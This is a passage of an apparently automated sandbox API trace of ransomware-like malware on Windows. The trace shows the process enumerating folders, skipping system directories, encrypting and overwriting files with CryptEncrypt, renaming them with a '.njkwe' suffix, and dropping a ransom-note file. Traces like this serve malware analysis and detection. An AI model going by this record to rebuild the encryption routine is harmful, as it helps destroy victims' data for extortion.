ftLastAccessTime.dwLowDateTime=0xf3768b28, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf378ed8a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0062.001] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0062.001] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0062.001] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0062.001] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0062.001] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0062.001] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\Client\\..") returned 35 [0062.001] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0062.001] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0062.001] FindNextFileW (in: hFindFile=0xc19d20, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xce2bc00, ftCreationTime.dwHighDateTime=0x1cac6d5, ftLastAccessTime.dwLowDateTime=0xce2bc00, ftLastAccessTime.dwHighDateTime=0x1cac6d5, ftLastWriteTime.dwLowDateTime=0xce2bc00, ftLastWriteTime.dwHighDateTime=0x1cac6d5, nFileSizeHigh=0x0, nFileSizeLow=0x31444, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Parameterinfo.xml", cAlternateFileName="PARAME~1.XML")) returned 1 [0062.001] lstrcmpiW (lpString1="Parameterinfo.xml", lpString2="Windows") returned -1 [0062.001] lstrcmpiW (lpString1="Parameterinfo.xml", lpString2="$Recycle.bin") returned 1 [0062.001] lstrcmpiW (lpString1="Parameterinfo.xml", lpString2="System Volume Information") returned -1 [0062.001] lstrcmpiW (lpString1="Parameterinfo.xml", lpString2="Program Files") returned -1 [0062.001] lstrcmpiW (lpString1="Parameterinfo.xml", lpString2="Program Files (x86)") returned -1 [0062.001] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\Client\\Parameterinfo.xml") returned 50 [0062.001] StrStrIW (lpFirst="Parameterinfo.xml", lpSrch=".njkwe") returned 0x0 [0062.001] lstrcmpW (lpString1="Parameterinfo.xml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0062.001] lstrcmpW (lpString1="Parameterinfo.xml", lpString2="taridd") returned -1 [0062.001] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\Client\\Parameterinfo.xml", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0062.001] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Client\\Parameterinfo.xml" (normalized: "c:\\588bce7c90097ed212\\client\\parameterinfo.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0062.001] GetTickCount () returned 0x114fec4 [0062.001] GetTickCount () returned 0x114fec4 [0062.001] GetTickCount () returned 0x114fec4 [0062.001] GetTickCount () returned 0x114fec4 [0062.001] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x80) returned 1 [0062.001] GetProcessHeap () returned 0xbe0000 [0062.001] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc43ec0 [0062.002] ReadFile (in: hFile=0x42c, lpBuffer=0xc43ec0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc43ec0*, lpNumberOfBytesRead=0x380f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0062.003] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0062.004] WriteFile (in: hFile=0x42c, lpBuffer=0xc43ec0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc43ec0*, lpNumberOfBytesWritten=0x380f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0062.004] GetProcessHeap () returned 0xbe0000 [0062.004] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc43ec0 | out: hHeap=0xbe0000) returned 1 [0062.004] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0062.004] WriteFile (in: hFile=0x42c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f7e4*=0x300, lpOverlapped=0x0) returned 1 [0062.004] WriteFile (in: hFile=0x42c, lpBuffer=0x380f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x380f730*, lpNumberOfBytesWritten=0x380f7e4*=0x80, lpOverlapped=0x0) returned 1 [0062.005] WriteFile (in: hFile=0x42c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f7e4*=0x4, lpOverlapped=0x0) returned 1 [0062.005] CloseHandle (hObject=0x42c) returned 1 [0062.009] GetProcessHeap () returned 0xbe0000 [0062.009] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc0e158 [0062.009] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\Client\\Parameterinfo.xml_r00t_{3sXlE5}.njkwe") returned 70 [0062.009] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\Client\\Parameterinfo.xml" (normalized: "c:\\588bce7c90097ed212\\client\\parameterinfo.xml"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\Client\\Parameterinfo.xml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\588bce7c90097ed212\\client\\parameterinfo.xml_r00t_{3sxle5}.njkwe")) returned 1 [0062.010] GetProcessHeap () returned 0xbe0000 [0062.010] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc0e158 | out: hHeap=0xbe0000) returned 1 [0062.010] FindNextFileW (in: hFindFile=0xc19d20, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x79a6a00, ftCreationTime.dwHighDateTime=0x1ca5de3, ftLastAccessTime.dwLowDateTime=0x79a6a00, ftLastAccessTime.dwHighDateTime=0x1ca5de3, ftLastWriteTime.dwLowDateTime=0x79a6a00, ftLastWriteTime.dwHighDateTime=0x1ca5de3, nFileSizeHigh=0x0, nFileSizeLow=0x9882, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="UiInfo.xml", cAlternateFileName="")) returned 1 [0062.010] lstrcmpiW (lpString1="UiInfo.xml", lpString2="Windows") returned -1 [0062.010] lstrcmpiW (lpString1="UiInfo.xml", lpString2="$Recycle.bin") returned 1 [0062.010] lstrcmpiW (lpString1="UiInfo.xml", lpString2="System Volume Information") returned 1 [0062.010] lstrcmpiW (lpString1="UiInfo.xml", lpString2="Program Files") returned 1 [0062.010] lstrcmpiW (lpString1="UiInfo.xml", lpString2="Program Files (x86)") returned 1 [0062.010] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\Client\\UiInfo.xml") returned 43 [0062.010] StrStrIW (lpFirst="UiInfo.xml", lpSrch=".njkwe") returned 0x0 [0062.010] lstrcmpW (lpString1="UiInfo.xml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0062.010] lstrcmpW (lpString1="UiInfo.xml", lpString2="taridd") returned 1 [0062.010] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\Client\\UiInfo.xml", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0062.010] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Client\\UiInfo.xml" (normalized: "c:\\588bce7c90097ed212\\client\\uiinfo.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0062.011] GetTickCount () returned 0x114fed3 [0062.011] GetTickCount () returned 0x114fed3 [0062.011] GetTickCount () returned 0x114fed3 [0062.011] GetTickCount () returned 0x114fed3 [0062.011] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x80) returned 1 [0062.011] GetProcessHeap () returned 0xbe0000 [0062.011] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc43ec0 [0062.011] ReadFile (in: hFile=0x42c, lpBuffer=0xc43ec0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc43ec0*, lpNumberOfBytesRead=0x380f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0062.033] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0062.037] WriteFile (in: hFile=0x42c, lpBuffer=0xc43ec0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc43ec0*, lpNumberOfBytesWritten=0x380f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0062.046] GetProcessHeap () returned 0xbe0000 [0062.046] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc43ec0 | out: hHeap=0xbe0000) returned 1 [0062.048] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0062.054] WriteFile (in: hFile=0x42c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f7e4*=0x300, lpOverlapped=0x0) returned 1 [0062.055] WriteFile (in: hFile=0x42c, lpBuffer=0x380f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x380f730*, lpNumberOfBytesWritten=0x380f7e4*=0x80, lpOverlapped=0x0) returned 1 [0062.055] WriteFile (in: hFile=0x42c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f7e4*=0x4, lpOverlapped=0x0) returned 1 [0062.055] CloseHandle (hObject=0x42c) returned 1 [0062.057] GetProcessHeap () returned 0xbe0000 [0062.057] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc0e158 [0062.057] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\Client\\UiInfo.xml_r00t_{3sXlE5}.njkwe") returned 63 [0062.057] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\Client\\UiInfo.xml" (normalized: "c:\\588bce7c90097ed212\\client\\uiinfo.xml"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\Client\\UiInfo.xml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\588bce7c90097ed212\\client\\uiinfo.xml_r00t_{3sxle5}.njkwe")) returned 1 [0062.057] GetProcessHeap () returned 0xbe0000 [0062.057] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc0e158 | out: hHeap=0xbe0000) returned 1 [0062.057] FindNextFileW (in: hFindFile=0xc19d20, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x79a6a00, ftCreationTime.dwHighDateTime=0x1ca5de3, ftLastAccessTime.dwLowDateTime=0x79a6a00, ftLastAccessTime.dwHighDateTime=0x1ca5de3, ftLastWriteTime.dwLowDateTime=0x79a6a00, ftLastWriteTime.dwHighDateTime=0x1ca5de3, nFileSizeHigh=0x0, nFileSizeLow=0x9882, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="UiInfo.xml", cAlternateFileName="")) returned 0 [0062.057] FindClose (in: hFindFile=0xc19d20 | out: hFindFile=0xc19d20) returned 1 [0062.057] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\Client\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 64 [0062.057] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Client\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\588bce7c90097ed212\\client\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0062.060] WriteFile (in: hFile=0x428, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380f7ec, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380f7ec*=0x351, lpOverlapped=0x0) returned 1 [0062.061] CloseHandle (hObject=0x428) returned 1 [0062.061] GetProcessHeap () returned 0xbe0000 [0062.061] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc27a58 | out: hHeap=0xbe0000) returned 1 [0062.061] FindNextFileW (in: hFindFile=0xc1a060, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbc518d00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbc518d00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbc518d00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x3ef6, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="DHtmlHeader.html", cAlternateFileName="DHTMLH~1.HTM")) returned 1 [0062.061] lstrcmpiW (lpString1="DHtmlHeader.html", lpString2="Windows") returned -1 [0062.061] lstrcmpiW (lpString1="DHtmlHeader.html", lpString2="$Recycle.bin") returned 1 [0062.061] lstrcmpiW (lpString1="DHtmlHeader.html", lpString2="System Volume Information") returned -1 [0062.061] lstrcmpiW (lpString1="DHtmlHeader.html", lpString2="Program Files") returned -1 [0062.061] lstrcmpiW (lpString1="DHtmlHeader.html", lpString2="Program Files (x86)") returned -1 [0062.061] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\DHtmlHeader.html") returned 42 [0062.061] StrStrIW (lpFirst="DHtmlHeader.html", lpSrch=".njkwe") returned 0x0 [0062.061] lstrcmpW (lpString1="DHtmlHeader.html", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0062.061] lstrcmpW (lpString1="DHtmlHeader.html", lpString2="taridd") returned -1 [0062.061] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\DHtmlHeader.html", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0062.061] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\DHtmlHeader.html" (normalized: "c:\\588bce7c90097ed212\\dhtmlheader.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0062.062] GetTickCount () returned 0x114ff02 [0062.062] GetTickCount () returned 0x114ff02 [0062.062] GetTickCount () returned 0x114ff02 [0062.062] GetTickCount () returned 0x114ff02 [0062.062] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x2c, dwBufLen=0x80 | out: pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x80) returned 1 [0062.062] GetProcessHeap () returned 0xbe0000 [0062.062] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc42eb8 [0062.062] ReadFile (in: hFile=0x428, lpBuffer=0xc42eb8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesRead=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0062.064] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0062.064] WriteFile (in: hFile=0x428, lpBuffer=0xc42eb8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesWritten=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0062.064] GetProcessHeap () returned 0xbe0000 [0062.064] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc42eb8 | out: hHeap=0xbe0000) returned 1 [0062.064] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0062.064] WriteFile (in: hFile=0x428, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380fa6c*=0x300, lpOverlapped=0x0) returned 1 [0062.064] WriteFile (in: hFile=0x428, lpBuffer=0x380f9b8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x380f9b8*, lpNumberOfBytesWritten=0x380fa6c*=0x80, lpOverlapped=0x0) returned 1 [0062.064] WriteFile (in: hFile=0x428, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380fa6c*=0x4, lpOverlapped=0x0) returned 1 [0062.064] CloseHandle (hObject=0x428) returned 1 [0062.066] GetProcessHeap () returned 0xbe0000 [0062.066] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc27a58 [0062.066] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\DHtmlHeader.html_r00t_{3sXlE5}.njkwe") returned 62 [0062.066] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\DHtmlHeader.html" (normalized: "c:\\588bce7c90097ed212\\dhtmlheader.html"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\DHtmlHeader.html_r00t_{3sXlE5}.njkwe" (normalized: "c:\\588bce7c90097ed212\\dhtmlheader.html_r00t_{3sxle5}.njkwe")) returned 1 [0062.067] GetProcessHeap () returned 0xbe0000 [0062.067] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc27a58 | out: hHeap=0xbe0000) returned 1 [0062.067] FindNextFileW (in: hFindFile=0xc1a060, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xce333000, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xce333000, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xce333000, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x159d5, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="DisplayIcon.ico", cAlternateFileName="DISPLA~1.ICO")) returned 1 [0062.067] lstrcmpiW (lpString1="DisplayIcon.ico", lpString2="Windows") returned -1 [0062.067] lstrcmpiW (lpString1="DisplayIcon.ico", lpString2="$Recycle.bin") returned 1 [0062.067] lstrcmpiW (lpString1="DisplayIcon.ico", lpString2="System Volume Information") returned -1 [0062.067] lstrcmpiW (lpString1="DisplayIcon.ico", lpString2="Program Files") returned -1 [0062.067] lstrcmpiW (lpString1="DisplayIcon.ico", lpString2="Program Files (x86)") returned -1 [0062.067] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\DisplayIcon.ico") returned 41 [0062.067] StrStrIW (lpFirst="DisplayIcon.ico", lpSrch=".njkwe") returned 0x0 [0062.067] lstrcmpW (lpString1="DisplayIcon.ico", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0062.067] lstrcmpW (lpString1="DisplayIcon.ico", lpString2="taridd") returned -1 [0062.067] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\DisplayIcon.ico", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0062.067] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\DisplayIcon.ico" (normalized: "c:\\588bce7c90097ed212\\displayicon.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0062.068] GetTickCount () returned 0x114ff12 [0062.068] GetTickCount () returned 0x114ff12 [0062.068] GetTickCount () returned 0x114ff12 [0062.068] GetTickCount () returned 0x114ff12 [0062.068] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x2c, dwBufLen=0x80 | out: pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x80) returned 1 [0062.068] GetProcessHeap () returned 0xbe0000 [0062.068] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc42eb8 [0062.068] ReadFile (in: hFile=0x428, lpBuffer=0xc42eb8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesRead=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0062.070] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0062.070] WriteFile (in: hFile=0x428, lpBuffer=0xc42eb8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesWritten=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0062.070] GetProcessHeap () returned 0xbe0000 [0062.070] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc42eb8 | out: hHeap=0xbe0000) returned 1 [0062.070] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0062.070] WriteFile (in: hFile=0x428, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380fa6c*=0x300, lpOverlapped=0x0) returned 1 [0062.070] WriteFile (in: hFile=0x428, lpBuffer=0x380f9b8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x380f9b8*, lpNumberOfBytesWritten=0x380fa6c*=0x80, lpOverlapped=0x0) returned 1 [0062.070] WriteFile (in: hFile=0x428, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380fa6c*=0x4, lpOverlapped=0x0) returned 1 [0062.071] CloseHandle (hObject=0x428) returned 1 [0062.073] GetProcessHeap () returned 0xbe0000 [0062.073] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc27a58 [0062.073] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\DisplayIcon.ico_r00t_{3sXlE5}.njkwe") returned 61 [0062.073] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\DisplayIcon.ico" (normalized: "c:\\588bce7c90097ed212\\displayicon.ico"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\DisplayIcon.ico_r00t_{3sXlE5}.njkwe" (normalized: "c:\\588bce7c90097ed212\\displayicon.ico_r00t_{3sxle5}.njkwe")) returned 1 [0062.074] GetProcessHeap () returned 0xbe0000 [0062.074] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc27a58 | out: hHeap=0xbe0000) returned 1 [0062.074] FindNextFileW (in: hFindFile=0xc1a060, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf378ed8a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf378ed8a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Extended", cAlternateFileName="")) returned 1 [0062.074] lstrcmpiW (lpString1="Extended", lpString2="Windows") returned -1 [0062.074] lstrcmpiW (lpString1="Extended", lpString2="$Recycle.bin") returned 1 [0062.074] lstrcmpiW (lpString1="Extended", lpString2="System Volume Information") returned -1 [0062.074] lstrcmpiW (lpString1="Extended", lpString2="Program Files") returned -1 [0062.074] lstrcmpiW (lpString1="Extended", lpString2="Program Files (x86)") returned -1 [0062.074] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\Extended") returned 34 [0062.074] lstrcmpW (lpString1="Extended", lpString2=".") returned 1 [0062.074] lstrcmpW (lpString1="Extended", lpString2="..") returned 1 [0062.074] lstrcmpW (lpString1="\\\\?\\C:\\588bce7c90097ed212\\Extended", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0062.074] GetProcessHeap () returned 0xbe0000 [0062.074] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc27a58 [0062.074] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\Extended\\*") returned 36 [0062.074] FindFirstFileW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Extended\\*", lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf378ed8a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf378ed8a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc1a320 [0062.074] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0062.074] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0062.074] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 